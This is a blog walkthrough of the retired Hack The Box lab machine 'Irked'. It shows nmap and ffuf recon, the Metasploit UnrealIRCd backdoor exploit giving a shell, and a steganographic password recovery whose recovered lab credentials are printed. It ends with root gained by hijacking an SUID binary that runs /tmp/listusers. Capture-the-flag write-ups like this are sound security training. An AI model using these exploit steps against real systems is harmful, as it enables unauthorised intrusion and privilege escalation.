thumbnail
Hack The Box Irked
hackthebox / pentest / ENG
2024.08.20.

irked

1. Machine Info

Irked is an easy-rated, retired machine from Hack the Box. And it is fairly rated I would say, even if the privesc part was little tricky if you don’t know what is steganography.

(machine pic)

But still, it was a doable machine and I had fun.

As always, let’s dive into the machine!

2. Recon

Starting with initial nmap scan:

PORT      STATE SERVICE    REASON
22/tcp    open  ssh        syn-ack ttl 63
80/tcp    open  http       syn-ack ttl 63
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind    syn-ack ttl 63
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35284/tcp   status
|   100024  1          48441/tcp6  status
|   100024  1          51878/udp   status
|_  100024  1          56479/udp6  status
6697/tcp  open  ircs-u     syn-ack ttl 63
8067/tcp  open  infi-async syn-ack ttl 63
35284/tcp open  status     syn-ack ttl 63
65534/tcp open  unknown    syn-ack ttl 63

So there are several services. Let’s list all of them

  • ssh
  • http
  • rpc
  • ircs-u, info-async (6697 and 8067)
  • two unknown services (likely out of scope)

Let’s start our enumeration.

3. Enumeration

Since ssh is very likely not vulnerable, I’ll start with http

3.1 HTTP 80

Index page shows just a single photo:

(potato)

I tried subdirectory enumeration:

┌──(hosan㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.10.10.117/FUZZ -c     

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.117/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

manual                  [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 89ms]
server-status           [Status: 403, Size: 300, Words: 22, Lines: 12, Duration: 100ms]
                        [Status: 200, Size: 72, Words: 5, Lines: 4, Duration: 145ms]
                        [Status: 200, Size: 72, Words: 5, Lines: 4, Duration: 49ms]
:: Progress: [56164/56164] :: Job [1/1] :: 757 req/sec :: Duration: [0:01:56] :: Errors: 1 ::

But nothing was really interesting. Since we also don’t have a dedicated domain name, that’s it for http, I guess.

3.2 Port 8067, 6697

Port 8067, 6697 have a running service named “irc”

┌──(hosan㉿kali)-[~/oscp/htb-box/irked]
└─$ sudo nmap 10.10.10.117 -p8067 -sC -sV -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 08:40 EDT
Nmap scan report for 10.10.10.117
Host is up (0.074s latency).

PORT     STATE SERVICE VERSION
8067/tcp open  irc     UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.5 (94%), Linux 3.8 (94%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Sony Android TV (Android 5.0) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: irked.htb

TRACEROUTE (using port 8067/tcp)
HOP RTT       ADDRESS
1   64.80 ms  10.10.16.1
2   138.23 ms 10.10.10.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds

I’ll dig deeper into this service, since this is only option.

4. Initial Foothold

We had the keyword unrealircd. I searched for cve:

┌──(hosan㉿kali)-[~]
└─$ searchsploit unrealirc
--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                     | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                          | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                   | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                        | windows/dos/27407.pl
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is a metasploit module. Even if we don’t have version number of current irc session, it’s worth trying it.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 1
payload => cmd/unix/bind_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] 10.10.10.117:8067 - Connected to 10.10.10.117:8067...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:8067 - Sending backdoor command...
[*] Started bind TCP handler against 10.10.10.117:4444
[*] Command shell session 1 opened (10.10.16.14:41723 -> 10.10.10.117:4444) at 2024-08-17 08:55:28 -0400

shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash

I had to struggle for a while to find a suitable payload, but it dropped a shell as user “ircd” at the end.

5. Shell as user djmardov

Running linenum.sh:

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 29 May 11  2018 /usr/lib/pymodules/python2.7/.path                                          
-rw-r--r-- 1 root root 2396 Apr  4  2018 /usr/lib/jvm/.java-1.7.0-openjdk-i386.jinfo
-rw-r--r-- 1 root root 0 May 11  2018 /etc/.java/.systemPrefs/.systemRootModFile
-rw-r--r-- 1 root root 0 May 11  2018 /etc/.java/.systemPrefs/.system.lock
-rw------- 1 root root 0 May 11  2018 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Nov  5  2016 /etc/skel/.bash_logout
-rw------- 1 Debian-gdm Debian-gdm 5584 Aug 17 08:28 /var/lib/gdm3/.ICEauthority
-r--r--r-- 1 root root 11 Aug 17 08:28 /tmp/.X0-lock
-rw-r--r-- 1 root root 0 Aug 17 08:27 /run/network/.ifstate.lock
-rw------- 1 ircd ircd 124 Apr 24  2004 /home/ircd/Unreal3.2/.cvsignore
-rw------- 1 ircd ircd 932 Apr 13  2009 /home/ircd/Unreal3.2/.CHANGES.NEW
-rw------- 1 ircd ircd 5623 Apr 13  2009 /home/ircd/Unreal3.2/.RELEASE.NOTES
-rw------- 1 ircd ircd 1645 Apr 24  2004 /home/ircd/Unreal3.2/.CONFIG.RANT
-rw------- 1 ircd ircd 519 Dec 10  2000 /home/ircd/Unreal3.2/.UPDATE
-rw------- 1 ircd ircd 1060 Apr 24  2004 /home/ircd/Unreal3.2/.SICI
-rw------- 1 ircd ircd 794 Aug 20  2000 /home/ircd/Unreal3.2/.indent.pro
-rw-r--r-- 1 ircd ircd 66 May 14  2018 /home/ircd/.selected_editor
-rw-r--r-- 1 djmardov djmardov 52 May 16  2018 /home/djmardov/Documents/.backup
-rw------- 1 djmardov djmardov 4706 Nov  3  2018 /home/djmardov/.ICEauthority
-rw-r--r-- 1 djmardov djmardov 220 May 11  2018 /home/djmardov/.bash_logout

We have a read permission on .backup in djmardov folder. This is indeed suspicious.

ircd@irked:~/Unreal3.2$ cat /home/djmardov/Documents/.backup
cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

What is steg bacup pw? This was a tricky part. Steg indicates that the password is hidden via steganography.

Steganography is the practice of concealing information within another message or physical object to avoid detection.

Have we seen any images before? yes, the potato photo from 80. I’ll use steghide to extract password out of it.

┌──(hosan㉿kali)-[~/oscp/htb-box/irked]
└─$ steghide extract -sf irked.jpg
Enter passphrase: 
wrote extracted data to "pass.txt".
                                                                                                                   
┌──(hosan㉿kali)-[~/oscp/htb-box/irked]
└─$ cat pass.txt         
Kab6h+m+bbp2J:HG

And we could log in via ssh.

6. Shell as root

I ran linpeas once more. After looking for a while, I found:

-rwsr-xr-x 1 root root 7.2K May 16 2018 /usr/bin/viewuser (Unknown SUID binary!)

Maybe it’s worth digging deeper.

djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-08-17 08:28 (:0)
djmardov pts/1        2024-08-17 09:22 (10.10.16.14)
sh: 1: /tmp/listusers: not found
djmardov@irked:/tmp$

Okay, let’s quickly create listusers in /tmp to see what happenes with echo “hello” > listuser

djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-08-17 08:28 (:0)
djmardov pts/1        2024-08-17 09:22 (10.10.16.14)
/tmp/listusers: 1: /tmp/listusers: hello: not found

So It tries to execute our input. Since there is no script named “hello”, it throws not found error.

It will give me a shell with /bin/bash.

djmardov@irked:/tmp$ echo "/bin/bash" > listusers
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-08-17 08:28 (:0)
djmardov pts/1        2024-08-17 09:22 (10.10.16.14)
root@irked:/tmp# djmardov@irked:

We got root. Done!

7. Source

  • HTB 2024
  • Me!

Source

  • Hack The Box 2024
  • Me!